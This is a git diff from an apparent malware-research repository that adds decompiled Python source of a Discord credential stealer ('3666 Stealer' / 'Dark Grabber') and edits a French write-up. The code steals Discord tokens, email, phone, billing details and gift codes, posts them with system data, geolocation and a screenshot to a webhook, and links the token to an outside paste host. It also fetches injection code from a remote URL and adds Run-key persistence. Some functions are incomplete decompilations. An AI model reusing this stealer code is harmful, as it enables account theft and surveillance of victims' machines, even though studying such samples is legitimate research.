'\n\n'.join(codes) + else: + codes = None + else: + codes = None + embed = Embed(f'''{username} ({user_id})''', 0, **('title', 'color')) + embed.set_thumbnail(avatar, **('url',)) + embed.add_field('<:bmoderator:1047945951152713798> Badges:', f'''{badges if badges != '' else 'None'}''', True, **('name', 'value', 'inline')) + embed.add_field('<:key1:1037772274188685322> MFA:', f'''`{mfa}`''', True, **('name', 'value', 'inline')) + embed.add_field('\xe2\x80\x8b', '\xe2\x80\x8b', False, **('name', 'value', 'inline')) + embed.add_field(' Nitro:', f'''`{nitro}`''', True, **('name', 'value', 'inline')) + embed.add_field(' Billing:', f'''`{payment_methods if payment_methods != '' else 'None'}`''', True, **('name', 'value', 'inline')) + embed.add_field('\xe2\x80\x8b', '\xe2\x80\x8b', False, **('name', 'value', 'inline')) + embed.add_field('<:token:1038576057206460436> Phone:', f'''`{phone if phone != None else 'None'}`''', True, **('name', 'value', 'inline')) + embed.add_field('\xe2\x80\x8b', '\xe2\x80\x8b', False, **('name', 'value', 'inline')) + embed.add_field('<:qlfBlanc:1028750908407951410> Email:', f'''`{email if email != None else 'None'}`''', True, **('name', 'value', 'inline')) + embed.add_field('\xe2\x80\x8b', '\xe2\x80\x8b', False, **('name', 'value', 'inline')) + embed.add_field(' Token:', f'''`{token}`\n[Copie Token !](https://paste-pgpj.onrender.com/?p={token})\n\xe2\x80\x8b''', False, **('name', 'value', 'inline')) + embed.add_field('\xe2\x80\x8b', '\xe2\x80\x8b', False, **('name', 'value', 'inline')) + if hq_guilds != None: + embed.add_field(' Permissions Server:', hq_guilds, False, **('name', 'value', 'inline')) + embed.add_field('\xe2\x80\x8b', '\xe2\x80\x8b', False, **('name', 'value', 'inline')) + if hq_friends != None: + embed.add_field(' Big Friend:', hq_friends, False, **('name', 'value', 'inline')) + embed.add_field('\xe2\x80\x8b', '\xe2\x80\x8b', False, **('name', 'value', 'inline')) + if codes != None: + embed.add_field(' Gift Codes:', codes, False, **('name', 'value', 'inline')) + embed.add_field('\xe2\x80\x8b', '\xe2\x80\x8b', False, **('name', 'value', 'inline')) + embed.set_footer('3666 Stealer', **('text',)) + self.webhook.send(embed, '3666 V1', 'https://cdn.discordapp.com/attachments/1040385802821185546/1041796452604719124/Picsart_22-11-14_07-42-50-867.png', **('embed', 'username', 'avatar_url')) + + diff --git a/Random/Dark Grabber/Annexes/injection.py b/Random/Dark Grabber/Annexes/injection.py new file mode 100755 index 0000000..ebb5c57 --- /dev/null +++ b/Random/Dark Grabber/Annexes/injection.py @@ -0,0 +1,56 @@ +# Source Generated with Decompyle++ +# File: injection.pyc (Python 3.10) + +import os +import re +import subprocess +import psutil +import requests + +class Injection: + + def __init__(self = None, webhook = None): + self.appdata = os.getenv('LOCALAPPDATA') + self.discord_dirs = [ + self.appdata + '\\Discord', + self.appdata + '\\DiscordCanary', + self.appdata + '\\DiscordPTB', + self.appdata + '\\DiscordDevelopment'] + self.code = requests.get('https://github.com/GMB-ZKG/stealer-3666/blob/main/src/components/injection.py').text + for proc in psutil.process_iter(): + if 'discord' in proc.name().lower(): + proc.kill() + # WARNING: Decompyle incomplete + + + def get_core(self = None, dir = None): + for file in os.listdir(dir): + if re.search('app-+?', file): + modules = dir + '\\' + file + '\\modules' + if not os.path.exists(modules): + continue + for file in os.listdir(modules): + if re.search('discord_desktop_core-+?', file): + core = modules + '\\' + file + '\\' + 'discord_desktop_core' + if not os.path.exists(core + '\\index.js'): + continue + return (core, file) + return None + + + def start_discord(self = None, dir = None): + update = dir + '\\Update.exe' + executable = dir.split('\\')[-1] + '.exe' + for file in os.listdir(dir): + if re.search('app-+?', file): + app = dir + '\\' + file + if os.path.exists(app + '\\' + 'modules'): + for file in os.listdir(app): + if file == executable: + executable = app + '\\' + executable + subprocess.call([ + update, + '--processStart', + executable], True, subprocess.PIPE, subprocess.PIPE, **('shell', 'stdout', 'stderr')) + + diff --git a/Random/Dark Grabber/Annexes/startup.py b/Random/Dark Grabber/Annexes/startup.py new file mode 100755 index 0000000..48b54e8 --- /dev/null +++ b/Random/Dark Grabber/Annexes/startup.py @@ -0,0 +1,58 @@ +# Source Generated with Decompyle++ +# File: startup.pyc (Python 3.10) + +import subprocess +import os +import shutil +import sys + +class Startup: + + def __init__(self = None): + self.working_dir = os.getenv('APPDATA') + '\\3666-stealer' + if self.check_self(): + return None + None.mkdir() + self.write_stub() + self.regedit() + + + def check_self(self = None): + if os.path.realpath(sys.executable) == self.working_dir + '\\dat.txt': + return True + + + def mkdir(self = None): + if not os.path.isdir(self.working_dir): + os.mkdir(self.working_dir) + return None + None.rmtree(self.working_dir) + os.mkdir(self.working_dir) + + + def write_stub(self = None): + shutil.copy2(os.path.realpath(sys.executable), self.working_dir + '\\dat.txt') + # WARNING: Decompyle incomplete + + + def regedit(self = None): + subprocess.run([ + 'reg', + 'delete', + 'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run', + '/v', + '3666-stealer', + '/f'], True, **('args', 'shell')) + subprocess.run([ + 'reg', + 'add', + 'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run', + '/v', + '3666-stealer', + '/t', + 'REG_SZ', + '/d', + f'''{self.working_dir}\\run.bat''', + '/f'], True, **('args', 'shell')) + + diff --git a/Random/Dark Grabber/Annexes/systeminfo.py b/Random/Dark Grabber/Annexes/systeminfo.py new file mode 100755 index 0000000..166ca7e --- /dev/null +++ b/Random/Dark Grabber/Annexes/systeminfo.py @@ -0,0 +1,117 @@ +# Source Generated with Decompyle++ +# File: systeminfo.pyc (Python 3.10) + +import ctypes +import os +import re +import subprocess +import uuid +import psutil +import requests +import wmi +from discord import Embed, File, SyncWebhook +from PIL import ImageGrab +import time + +class SystemInfo: + + def __init__(self = None, webhook = None): + webhook = SyncWebhook.from_url(webhook) + embed = Embed('System Information', 0, **('title', 'color')) + embed.add_field(self.user_data()[0], self.user_data()[1], self.user_data()[2], **('name', 'value', 'inline')) + embed.add_field(self.system_data()[0], self.system_data()[1], self.system_data()[2], **('name', 'value', 'inline')) + embed.add_field(self.disk_data()[0], self.disk_data()[1], self.disk_data()[2], **('name', 'value', 'inline')) + embed.add_field(self.network_data()[0], self.network_data()[1], self.network_data()[2], **('name', 'value', 'inline')) + embed.add_field(self.wifi_data()[0], self.wifi_data()[1], self.wifi_data()[2], **('name', 'value', 'inline')) + image = ImageGrab.grab(None, False, True, None, **('bbox', 'include_layered_windows', 'all_screens', 'xdisplay')) + image.save('screenshot.png') + embed.set_image('attachment://screenshot.png', **('url',)) + + try: + webhook.send(embed, File('.\\screenshot.png', 'screenshot.png', **('filename',)), '3666 Info PC', 'https://cdn.discordapp.com/attachments/1040385802821185546/1041796452604719124/Picsart_22-11-14_07-42-50-867.png', **('embed', 'file', 'username', 'avatar_url')) + finally: + pass + if os.path.exists('screenshot.png'): + os.remove('screenshot.png') + return None + return None + + + + def user_data(self = None): + + def display_name(): + GetUserNameEx = ctypes.windll.secur32.GetUserNameExW + NameDisplay = 3 + size = ctypes.pointer(ctypes.c_ulong(0)) + GetUserNameEx(NameDisplay, None, size) + nameBuffer = ctypes.create_unicode_buffer(size.contents.value) + GetUserNameEx(NameDisplay, nameBuffer, size) + return nameBuffer.value + + display_name = display_name() + hostname = os.getenv('COMPUTERNAME') + username = os.getenv('USERNAME') + return (' User', f'''```Display Name: {display_name}\nHostname: {hostname}\nUsername: {username}```''', False) + + + def system_data(self = None): + + def get_hwid(): + hwid = subprocess.check_output('C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid', True, subprocess.PIPE, subprocess.PIPE, **('shell', 'stdin', 'stderr')).decode('utf-8').split('\n')[1].strip() + return hwid + + cpu = wmi.WMI().Win32_Processor()[0].Name + gpu = wmi.WMI().Win32_VideoController()[0].Name + ram = round(float(wmi.WMI().Win32_OperatingSystem()[0].TotalVisibleMemorySize) / 1048576, 0) + hwid = get_hwid() + return ('<:ipa:1038595676084391999> System', f'''```CPU: {cpu}\nGPU: {gpu}\nRAM: {ram}\nHWID: {hwid}```''', False) + + + def disk_data(self = None): + disk = '{:<9} {:<9} {:<9} {:<9} '.format('Drive', 'Free', 'Total', 'Use%') + '\n' + for part in psutil.disk_partitions(False, **('all',)): + if os.name == 'nt': + if 'cdrom' in part.opts or part.fstype == '': + continue + usage = psutil.disk_usage(part.mountpoint) + disk += '{:<9} {:<9} {:<9} {:<9} '.format(part.device, str(usage.free // 1073741824) + 'GB', str(usage.total // 1073741824) + 'GB', str(usage.percent) + '%') + '\n' + return ('<:ipa:1038595676084391999> Disk', f'''```{disk}```''', False) + + + def network_data(self = None): + + def geolocation(ip = None): + url = f'''http://ip-api.com/json/{ip}''' + response = requests.get(url, { + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36' }, **('headers',)) + data = response.json() + return (data['country'], data['regionName'], data['city'], data['zip'], data['as']) + + + def proxy_check(ip = None): + url = f'''https://vpnapi.io/api/{ip}''' + response = requests.get(url, { + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36' }, **('headers',)) + data = response.json() + security = data['security'] + (proxy, vpn, tor) = [ + security['proxy'], + security['vpn'], + security['tor']] + if proxy and vpn or tor: + return True + + ip = requests.get('https://api.ipify.org').text + mac = ':'.join(re.findall('..', '%012x' % uuid.getnode())) + (country, region, city, zip_, as_) = geolocation(ip) + proxy = proxy_check(ip) + return (':satellite: Network', '```IP Address: {ip}\nMAC Address: {mac}\nCountry: {country}\nRegion: {region}\nCity: {city} ({zip_})\nISP: {as_}\nVPN/Proxy/Tor: {proxy}```'.format(ip, mac, country, region, city, zip_, as_, proxy, **('ip', 'mac', 'country', 'region', 'city', 'zip_', 'as_', 'proxy')), False) + + + def wifi_data(self = None): + networks = [] + out = '' + # WARNING: Decompyle incomplete + + diff --git a/Random/Dark Grabber/writeup.md b/Random/Dark Grabber/writeup.md index c45522f..3c074bc 100755 --- a/Random/Dark Grabber/writeup.md +++ b/Random/Dark Grabber/writeup.md @@ -26,7 +26,9 @@ On extrait les fichiers : * startup.py * systeminfo.py -C'est un grabber python classique, il récupère les mots de passe des navigateurs, les cookies, les tokens discord et il s'injecte dans discord. +Les fichiers sont dans [l'annexe.](https://github.com/ALittlePatate/Malware-Research/tree/master/Random/Dark%20Grabber/Annexe) + +C'est un stealer python classique, il récupère les mots de passe des navigateurs, les cookies, les tokens discord et il s'injecte dans discord. La config : ```Python